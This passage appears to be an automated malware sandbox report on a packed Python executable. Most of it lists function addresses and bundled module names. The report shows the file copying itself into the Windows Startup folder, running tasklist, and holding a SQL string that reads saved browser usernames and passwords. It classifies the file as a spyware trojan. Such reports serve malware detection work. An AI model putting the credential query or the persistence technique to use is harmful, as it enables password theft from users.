            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2FDDA010_2_00007FFBAA2FDDA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2BBDA010_2_00007FFBAA2BBDA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2CCDE010_2_00007FFBAA2CCDE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA31AE7010_2_00007FFBAA31AE70
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2D72D010_2_00007FFBAA2D72D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2D62F010_2_00007FFBAA2D62F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA35433010_2_00007FFBAA354330
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA3133B010_2_00007FFBAA3133B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA30A49010_2_00007FFBAA30A490
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2C349010_2_00007FFBAA2C3490
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA3710E010_2_00007FFBAA3710E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2B40B010_2_00007FFBAA2B40B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA31A11010_2_00007FFBAA31A110
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA3620B010_2_00007FFBAA3620B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA3111D010_2_00007FFBAA3111D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA34A28010_2_00007FFBAA34A280
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2B329510_2_00007FFBAA2B3295
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA3576C010_2_00007FFBAA3576C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2C66F010_2_00007FFBAA2C66F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2E079010_2_00007FFBAA2E0790
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA35475010_2_00007FFBAA354750
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2FF7D010_2_00007FFBAA2FF7D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2B77C410_2_00007FFBAA2B77C4
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2DD7C010_2_00007FFBAA2DD7C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2B47C010_2_00007FFBAA2B47C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA3527A010_2_00007FFBAA3527A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2CC80010_2_00007FFBAA2CC800
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA35C87010_2_00007FFBAA35C870
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2B282E10_2_00007FFBAA2B282E
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2DE4D010_2_00007FFBAA2DE4D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2B74B110_2_00007FFBAA2B74B1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2B451010_2_00007FFBAA2B4510
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA32258010_2_00007FFBAA322580
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2DC53010_2_00007FFBAA2DC530
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2F459010_2_00007FFBAA2F4590
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA30B53010_2_00007FFBAA30B530
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA3585B010_2_00007FFBAA3585B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA3535D010_2_00007FFBAA3535D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2B964010_2_00007FFBAA2B9640
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB321FF010_2_00007FFBAB321FF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3229C010_2_00007FFBAB3229C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3224A010_2_00007FFBAB3224A0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB322EC010_2_00007FFBAB322EC0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB321D8010_2_00007FFBAB321D80
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB32355010_2_00007FFBAB323550
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB33211010_2_00007FFBAB332110
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB331D4010_2_00007FFBAB331D40
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB341F1010_2_00007FFBAB341F10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3421C010_2_00007FFBAB3421C0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB361FA010_2_00007FFBAB361FA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB371F4010_2_00007FFBAB371F40
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB37205010_2_00007FFBAB372050
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB381D4010_2_00007FFBAB381D40
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3822D010_2_00007FFBAB3822D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB39216010_2_00007FFBAB392160
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3A207010_2_00007FFBAB3A2070
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3C222010_2_00007FFBAB3C2220
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB72C48010_2_00007FFBBB72C480
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB73098010_2_00007FFBBB730980
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7712B010_2_00007FFBBB7712B0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7718E010_2_00007FFBBB7718E0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB77100010_2_00007FFBBB771000
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB797C3810_2_00007FFBBB797C38
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7B7BA010_2_00007FFBBB7B7BA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7B7F7910_2_00007FFBBB7B7F79
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB86577010_2_00007FFBBB865770
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821AD710_2_00007FFBBB821AD7
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB899B3010_2_00007FFBBB899B30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB8221DF10_2_00007FFBBB8221DF
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB82159610_2_00007FFBBB821596
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821EDD10_2_00007FFBBB821EDD
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB821D8E10_2_00007FFBBB821D8E
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: String function: 00007FFBAB711325 appears 71 times
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: String function: 00007FFBAA5B0F90 appears 34 times
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: String function: 00007FF78F482B30 appears 47 times
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: String function: 00007FFBAB78C181 appears 218 times
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: String function: 00007FFBAB6A3880 appears 114 times
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: String function: 00007FFBAB78C16F appears 50 times
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: String function: 00007FFBAA5894B0 appears 134 times
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: String function: 00007FFBAB78C93D appears 31 times
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: String function: 00007FFBAA58A550 appears 165 times
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: String function: 00007FFBAB6A3800 appears 51 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: String function: 00007FFBAA2B94B0 appears 134 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: String function: 00007FF769322B30 appears 47 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: String function: 00007FFBAA2E0F90 appears 34 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: String function: 00007FFBBB723880 appears 114 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: String function: 00007FFBAA2BA550 appears 165 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: String function: 00007FFBBB821325 appears 105 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: String function: 00007FFBBB89C16F appears 74 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: String function: 00007FFBBB89C181 appears 220 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: String function: 00007FFBBB723800 appears 51 times
            Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: _overlapped.pyd.9.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: unicodedata.pyd.9.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: HyZh4pn0RF.exe, 00000000.00000003.1468754068.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1483242244.0000027ADD238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepywintypes312.dll0 vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1470434646.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1470258867.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1468353119.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1475480253.0000027ADD238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1483757328.0000027ADD238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1469455795.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1485125608.0000027ADD238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewin32api.pyd0 vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1475801441.0000027ADD238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1469300025.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000000.00000003.1470676625.0000027ADD237000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_wmi.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exeBinary or memory string: OriginalFilename vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1842934504.00007FFBBC156000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1841251217.00007FFBBAE74000.00000002.00000001.01000000.00000018.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1842441223.00007FFBBB3A2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1842722016.00007FFBBBE96000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1833750878.00007FFBAABDA000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1840288260.00007FFBB62AB000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1838167665.00007FFBAB6FD000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1835624099.00007FFBAB295000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython312.dll. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1843741093.00007FFBBCD59000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1842069823.00007FFBBB385000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1843429491.00007FFBBC26E000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1839469008.00007FFBB4C4E000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1843229060.00007FFBBC247000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_wmi.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1841719090.00007FFBBAF63000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exe, 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs HyZh4pn0RF.exe
            Source: HyZh4pn0RF.exeBinary or memory string: OriginalFilename vs HyZh4pn0RF.exe
            Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@16/154@4/4
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F488560 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF78F488560
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3324:120:WilError_03
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI3442Jump to behavior
            Source: HyZh4pn0RF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
            Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT action_url, username_value, password_value FROM logins;
            Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: HyZh4pn0RF.exeBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: HyZh4pn0RF.exeReversingLabs: Detection: 50%
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeFile read: C:\Users\user\Desktop\HyZh4pn0RF.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\HyZh4pn0RF.exe "C:\Users\user\Desktop\HyZh4pn0RF.exe"
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeProcess created: C:\Users\user\Desktop\HyZh4pn0RF.exe "C:\Users\user\Desktop\HyZh4pn0RF.exe"
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
